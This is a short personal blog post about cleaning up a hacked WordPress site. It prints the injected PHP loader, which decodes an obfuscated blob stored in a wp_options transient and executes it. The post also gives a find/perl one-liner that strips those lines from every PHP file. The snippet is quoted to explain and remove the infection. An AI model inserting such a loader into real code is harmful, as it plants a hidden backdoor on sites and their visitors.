We’re back

So I totally got hacked. Reminder: be vigilant about upgrading wordpress and its plugins, or bad things happen.

The hack looks like this, and appears all over the place, at the top of some files and the bottom of others. It decodes a huge blob of encoded text that was stuffed into one of the wp-options values.

get_option("_transient_feed_98e8dbd04edf43b096e815a29343b006"); $z=base64_decode(str_rot13($z)); if(strpos($z,"0FE00707")!==false){ $_z=create_function("",$z); @$_z(); }

My first thought: “Oh crap, removing that text from hundreds of files? No thanks.”. Command line to the rescue! Thanks to Perl for still being awesome after all these years.

find . -name "*.php" -exec perl -e 's/^.*_transient_feed_98e8dbd04edf43b096e815a29343b006.*$//g' -p -i {} ;

If you’ve been struck by the same thing, just replace the _transient_feed with your own (the numbers probably change). These script-kiddy hackers are a perpetual annoyance. Hey kids – go build something awesome and useful instead of messing our web sites.

Published
Categorized as General

By Dan Walmsley

Dan Walmsley

Leave a comment

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.